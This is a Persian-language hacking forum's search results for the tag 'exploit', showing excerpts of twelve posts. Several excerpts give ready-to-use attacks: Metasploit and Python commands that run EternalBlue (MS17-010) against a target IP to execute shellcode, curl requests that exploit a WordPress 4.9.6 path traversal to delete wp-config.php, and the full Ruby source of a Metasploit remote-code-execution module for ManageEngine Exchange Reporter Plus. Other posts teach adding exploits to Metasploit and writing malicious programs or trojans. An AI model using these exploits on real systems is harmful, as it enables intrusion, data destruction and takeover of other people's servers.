iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اکسپلویت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

12 نتیجه پیدا شد

  1. دوره آموزشی اکسپلویت نویسی مقدماتی از فرانش مدرس : بهروز منصوری سایت : https://faranesh.com/network-security/15521-preliminary-exploit دانلود رایگان : http://s9.picofile.com/file/8351923392/1_معرفی_دوره.mp4.html http://s9.picofile.com/file/8351924742/2_آشنایی_با_اصطلاحات_و_دورک_نویسی.mp4.html http://s9.picofile.com/file/8351928484/3_نحوه_نوشتن_استاندارد_یک_اکسپلویت.mp4.html http://s8.picofile.com/file/8351931284/4_ثبت_یک_اکسپلویت_به_صورت_آنلاین.mp4.html
  2. Rednofozi

    Security

    اکسپلویت نسبتا جدیدی که توسط هکر هایی از سیستم های سازمان NSA دزدیده شد این اکسپلویت با استفاده از اسیب پذیری سرویس SMB ویندوز عمل میکند و باعث اجرای کد از راه دور میشود سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟ امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان چه سیستم عامل هایی را شامل میشود ؟ Windows XP Windows 2000 Windows 2003 R2 Windows 2008 R2 Windows 2012 R2 Windows 7 SP1 Windows 8.1 Windows 2016 Windows 10 سطح دسترسی با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید نکته از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد نصب یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر msfupdate اجرای اکسپلویت در متااکسپلویت اجرای متا msfconsole انتخاب اکسپلویت use address/smb/smb_ms17_010 نمایش اطلاعات ست شده options ست کردن ایپی سیستم set rhosts ip_server ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است set rport 445 اجرا یا run exploit (همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.) اجرای اکسپلویت با ابزار ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف دانلود ابزار با استفاده از دستور زیر git clone link چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم python checker.py ip_server اجرای شل کد بر روی سیستم با استفاده از اکسپلویت python exploit.py ip_server shellcode دانلود کیلاگر و اموزش کیلاگر موجو به زبان فارسی معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب اجرا با دستور زیر ruby eternalblue_doublepulsar.rb نکته : در استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد. فایل های ابزار اکسپلویت Eternalblue : GitHub - ElevenPaths/Eternalblue-Doublepulsar-Metasploit GitHub - worawit/MS17-010: MS17-010 GitHub - hanshaze/MS17-010-EternalBlue-WinXP-Win10: EternalBlue Metasploit Port to various Windows Versions from Windows XP SP2 up to Windows 10 Pro
  3. این پایه ی امنیت در دنیای مجازی میباشد و منطقی هم به بنظر میاد درسته ؟ حتی اگر من به شما بگم که پیشنهاد گرفتن فول اکسس از سیستم هیچکسی را قبول نکنید. یک اسیب پذیری خطرناک در دستیار از راه دور ماکروسافت که به (Quick Assist) معروف است کشف شده است که روی تمامی ورژن های ویندوز تاثیر گذار است ، از جمله ویندوز ۱۰ و ۸٫۱ و ۷ که به هکرها اجازه میدهد اطلاعات مهم و حیاتی شمارا از راه دور به سرقت ببرند ? دستیار از راه دور ویندوز چیست ؟؟؟ ابزاری است که به فردی که اعتماد دارید اجازه میدهد کنترل سیستم شمارا در دست بگیرد و یا شما مال آن ها را کنترل کنید و معمولا برای حل مشکلات کامپیوتری مختلف و کمک رسانی مورد استفاده قرار میگیرد. مانند RDP یا همان “remote desktop protocol” که به شما اجازه میدهد یک ارتباط ایمن با کسی نیاز دارید برقرار کنید ? نابیل احمد از شرکت امنیتی “Trend Micro” آسیب پذیری از نوع ۰Day کشف و اطلاعات آن را تحت عنوان “CVE-2018-0878” در دستیار از راه دور ماکروسافت پیدا کرد و گزارش داد که به هکر اجازه دزدیدن اطلاعات مهم و حساس را از راه دور میدهد… این آسیب پذیری در روز سه شنبه یعنی دیروز توسط شرکت ماکروسافت پچ شد !!! این آسیب پذیری روی سرور های زیر تاثیر گذار است : Microsoft Windows Server 2016 Microsoft Windows Server 2012 و R2 Microsoft Windows Server 2008 SP1 و SP2 Windows 10 , 8.1 , 7- 64,32bit اطلاعات مربوط به اکسپلویت : CVE - CVE-2018-0878 امیدوارم که ازین پست لذت برده باشید
  4. با سلام نفوذی هستم در این تاپیک هر چیزی که به اکسپلوت نوسی ربط داشته باشه قرار داده خواهد شد توسط اساتید محترم و همچنین فیلم های تصویری در این موضع قوانین 1- به هیچ عنوان زیر پست سوال نکنید در بخش سوال جواب سوالتون بپرسید 2- اسپم الکی مساوی با اخطار و یا بن 3- به اموزش دهنده احترام بزارید هدف ما علم هستش و با یه تشکر یا لایک اموزش دهنده رو خوشحال کنید یا حق
  5. اکسپلویت وردپرس ۴٫۹٫۶ توضیحات درباره وردپرس و اکسپلویت وردپرس وردپرس یک سیستم مدیرت محتوا بسیار محبوب و پر استفاده در دنیای اینترنت میباشد که این امکان را میدهد در کمتر از ۵ دقیقه وبلاگ خود را راه اندازی کنید به همین دلیل کاربران بسیاری را به سمت خود جذب کرده است و حجم زیادی از سایت های دنیا بر پایه این سیستم مدریت محتوا میباشند در این پست اموزشی حفره امنیتی جدید وردپرس را معرفی میکنیم و توضیحات کاملی درباره ان خواهیم داد اکسپلویت وردپرس در نسخه جدید وردپرس ورژن 4.9.6 اسب پذیری مهمی کشف شد و داخل سایت های ثبت اکسپلویت ان را مشاهده میکنیم این اسیب پذیری این امکان را به نفوذگر میدهد که فایل های درون دایرکتوری سرور را حذف نماید که این میتواند مشکلات بسیاری را رقم بزند به طور مثال فایل config وردپرس یکی از مهم ترین فایل های ان میباشد که درصورتی که حذف شود امکان ریست وردپرس به شخص داده میشود و میتوانید سیستم را از نو با پسود جدید راه اندازی کند نحوه استفاده و اموزش هک این باگ در برگه post.php وردپرس و ورودی thumb که برای ادرس فایل ها میباشد کشف شده است و هک وردپرس و راه های امنیت پس برای استفاده از اکسپلویت وردپرس به صورت دستی ان باید یک دسترسی سطح پایین داشت مانند نویسنده در قسمت رسانه ها یک تصویر جدید اپلود میکنیم و در قسمت تغیرات وارد میشویم در اینجا وارد لینوکس خود شوید و دقت کنید سرویس curl نصب باشد بعد از ان همانند دستور زیر فایل مورد نظر خود را حذف کنید curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ادرس سایت مورد نظر خود را در قسمت site وارد کنید و در اخر هم صحفه مورد نظر مانند Config.php را میتوانید برای حذف انتخاب کنید حال صفجه مورد نظر انتخاب شده است و برای حذف ان مانند دستور زیر انجام میدهیم curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' بعد از اجرای دستور بالا اکسپلویت شما با موفقیت عمل میکنید
  6. قطعا رفتید توی سایت های ثبت باگ و اکسپلویت هایی دیدید که به زبان روبی برای متااسپلویت نوشته شدن ولی شما نمیتونید از اون های استفاده کنید چون بلد نیستید به متااسپلویت خودتون اکسپلویت اضافه کنید. خب توی این آموزش میخوایم به اضافه کردن اکسپلویت به متااسپلویت بپردازیم : ابتدا لینوکس خودتون رو باز کنید و وارد مسیر زیر بشید : /usr/share/metasploit-framework/ اینجا مسیری هست که متااسپلویت شما قرار گرفته. حالا وارد پوشه ی modules و بعد از اون وارد پوشه ی exploit بشید… اینجا دیگه خودتون یه پوشه بسازید اسمش رو هر چی میخواید بسازید مثلا من میزارم myexploits فقط توجه داشته باشید از فاصله (Space) توی اسم این پوشه استفاده نکنید که بعدا مشکلاتی ایجاد میکنه. اینجا یک فایل بسازید با اسم دلخواه ولی با پسوند rb به طور مثال اکسپلویتی که مربوط به revslider در wordpress هست رو میزاریم wp-revslider.rb و درون این فایل اکسپلویت خودتون رو که از سایت های ثبت باگ دیدید قرار میدید حالا وارد نرم افزار متااسپلویت میشید (با دستور msfconsole) و بعد از اون به این صورت اکسپلویت خودتون رو فراخوانی میکنید : use exploit/(esme folderi ke sakhtid)/(esme exploit ke gozashtid) که برای مثال امروز ما میشه : use exploit/myexploits/wp-revslider هم اکنون میتوانید از این اکسپلویت استفاده کنید
  7. اکسپلویت مدیریت موتور مبادله گزارشگر Plus - اجرای کد از راه دور (Metasploit) class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE', 'Description' => %q{ This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet }, 'License' => MSF_LICENSE, 'Author' => [ 'Kacper Szurek <kacperszurek@gmail.com>' ], 'References' => [ ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html'] ], 'Platform' => ['win'], 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Jun 28 2018', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, 'The URI of the application', '/']), Opt::RPORT(8181), ]) end def bin_to_hex(s) s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join end def check res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion') }) unless res vprint_error 'Connection failed' return CheckCode::Safe end unless res.code == 200 vprint_status 'Target is not Manage Engine Exchange Reporter Plus' return CheckCode::Safe end begin json = res.get_json_document raise if json.empty? || !json['BUILD_NUMBER'] rescue vprint_status 'Target is not Manage Engine Exchange Reporter Plus' return CheckCode::Safe end vprint_status "Version: #{json['BUILD_NUMBER']}" if json['BUILD_NUMBER'].to_i <= 5310 return CheckCode::Appears end CheckCode::Safe end def exploit res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'), 'vars_post' => { 'MTCALL' => "nativeClient", 'BCP_RLL' => "0102", 'BCP_EXE' => bin_to_hex(generate_payload_exe) } }) end end
  8. با استفاده از این تاپیک من مهارت های لازم برای اکسپلویت را اموزش میدهم. همان طور که بیشتر شما میدانید توسعه دهندگان نرم افزار بر روی برنامه های خود کار میکنند که مشکلات نرم افزاری را رفع کنند و به دنبال آسیب پذیری های برنامه خود هستند و میخواهند آن ها را رفع کنند تا زمانی که اکسپلویت ها دیگر کار نکنند(با وجود این، از تعدادی از سیستم های آسیب پذیری اصلاح نشده را دست کم نگیرید. بسیاری از شرکت ها از انجام پچ بی توجهی میکنند میلیون ها سیستم آسیب پذیری اصلاح نشده وجود دارد!)
  9. بسم الله الرحمن الرحیم طراحی برنامه های مخرب تحت زبان برنامه نویسی، پایتون! خوب، دوستان عزیز من در اولین پستم قصد دارم که با کمک هم، یکمی از دانش های همدیگه رو به اشتراک بذاریم. شرایط به این صورته که همه میتونن پست هاشونو ارسال کنن ولی اگه برنامه های خودشون که به زبان پایتون نوشتن باشه، خیلی هم عالی میشه. مهمترین چیزی که باید بگم اینه : لطفا اسپم نکنید! چیز دیگه ای یادم نمیاد که بگم، پس یا علی!
  10. درود! اموزش من با دستورات ساده و باز کردن متااسپلویت شروع شد و هدف من برای اموزش این است تا شما اصول اولیه هک را یاد بگیرید به نظر من قدرتمند ترین ابزار هک متااسپلویت است زیرا ما میتوانیم کار های بسیار زیادی انجام داد مثل ساخت تروجان و هک سایت . show(نمایش) "Show" یکی از دستور های مهم متااسپلویت است میتوان از آن برای استفاده از modules و payloads و اکسپلویت ها و ... استفاده کرد ما میتوانیم از این دستور برای سریع کردن کار خود استفاده کنیم دستور "show" را اگر به تنهایی وارد کنیم هم وقت زیادی میرود و معمولا هم گذینه های اضافیی برای ما نمایش داده میشود اما اگر show payloads را وارد کنیم میتوانیم فقط payload ها را میشاهده کنیم
  11. P$YCH0S0C!@L

    اکسپلویت چیست ؟ کسپلویت کدی برای سوء استفاده از حفره های امنیتی برنامه های کاربردی، سیستم عامل ها، هسته سیستم عامل ها، وب سرور و در کل هر نرم افزاری که در یک شبکه و یا کامپیوتر کار میکند میباشد. اکسپلویت ها میتوانند با زبان های مختلف برنامه نویسی نوشته شوند و هدف آنها استفاده و ایجاد دسترسی غیر مجاز، ایجاد حملات مختلف و یا اختلال در سیستم های کامپیوتری میباشد. اکسپلویت ها معمولا هنگام کشف آسیب پذیری ها و یا بعد از کشف حفره های امنیتی نوشته میشوند، اکسپلویت نویس ها عمدتا هکر میباشند که با تکنیک ها و متدهای مختلف اقدام به نوشتن کدهای مخرب مینمایند، بعضا دیده میشود که متخصصان و مدیران امنیتی مطرح نیز اقدام به نوشتن اکسپلویت، برای اثبات آسیب پذیری های مهم کرده اند. اکسپلویت ها به زبانهای مختلف و در دسته بندی های مختلف عرضه میشوند : اکسپلویت ها عمدتا به زبانهای C++، Perl و یا PHP و Python نوشته میشوند، ولی بسته به نوع آسیب پذیری و بستر آسیب پذیر متغییر میباشند، برای مثال زبانی که اکسپلویت های معروف Metasploit با آن نوشته شده Ruby میباشد. عمده اکسپلویت ها به دو نوع تقسیم بندی میشوند، لوکال و رموت؛ اکسپلویت های Local نیاز به دسترسی قبلی به سیستم قربانی دارد و بعد از ایجاد دسترسی اولیه که ممکن است از آسیب پذیری های تحت وب دیگر به دست آمده باشد مورد استفاده قرار میگیرد که منجر به ارتقاء دسترسی موجود تا کاربری سطح ریشه و مدیر، را فراهم میکنند. اکسپلویت های Remote، از آسیب پذیری های برنامه های کاربردی (Aplicattion) استفاده کرده و منجر به نفوذ به شبکه میشوند و معمولا دسترسی های غیر مجاز با سطوح مختلف بسته به نوع آسیب پذیری را ایجاد میکنند. اکسپلویت ها معمولا بصورت سورس و کد منتشر میشوند که میتوانند در سیستم عامل های مختلف مورد استفاده قرار گیرند، و نیاز به کامپایل دارند، معمولا هکرها همه کامپایلرهای زبان های مختلف را در سیستم خود دارند و کامپایلرها جزئی جدا نشدنی از ابزارهای هک برای هکرها محسوب میشوند. پژوهشگرها یا محققین امنیتی – Security Reserchers باگ ها و حفره های امنیتی توسط این افراد کشف و گزارش میشوند که منجر به نوشته شدن کدهای مخرب و اکسپلویت ها، برای آسیب پذیری های کشف شده میشوند، بعضا خود این افراد اقدام به کد نویسی و انتشار آن در سایتهای امنیتی برای اثبات آسیب پذیری و گاهی اوقات برای معروفیت خود مینمایند، عمده این محققین جوان و جویای نام بوده و حفره های امنیتی خطرناک که باعث رخداد های بزرگ امنیتی جهانی میشوند، توسط این جوانهای هکر کشف و مورد استفاده قرار میگیرند. منافع اقتصادی اکسپولیت و اکسپلویت نویسی: برخی Resercher ها نیز از علم خود برای منافع اقتصادی استفاده میکنند، باگ های و حفره های امنیتی را کشف و به فروش میرسانند، این باگ ها که توسط هکرهای هدف دار خریداری میشوند گاه تا چندین میلیون و یا چند صد میلیون تومان قیمت گذاری میشوند، برای مثال در کشور ایران هکرهایی از این مثل داریم که حفره امنیتی کشف و بفروش میرسانند که تا 20 میلیون تومان قیمت گذاری میشوند. (سایت هایی برای فروش اکسپلویت و آسیب پذیری وجود دارند)
  12. ReZa CLONER

    اکسپلویت

    View File اکسپلویت اکسپلویت Wordpress Plugin Advanced uploader v2.10 نفوذگر با بهره برداری از این آسیب پذیری می تواند فایل مخرب یا شل خود را بروی سرور آپلود کند و یا فایل های محلی سرور را مشاهده کند. ‼️این باگ در نسخه های جدید وردپرس رفع شده است‼️ Submitter ReZa CLONER Submitted ۱۶/۱۰/۲۸ Category مباحث آموزش هک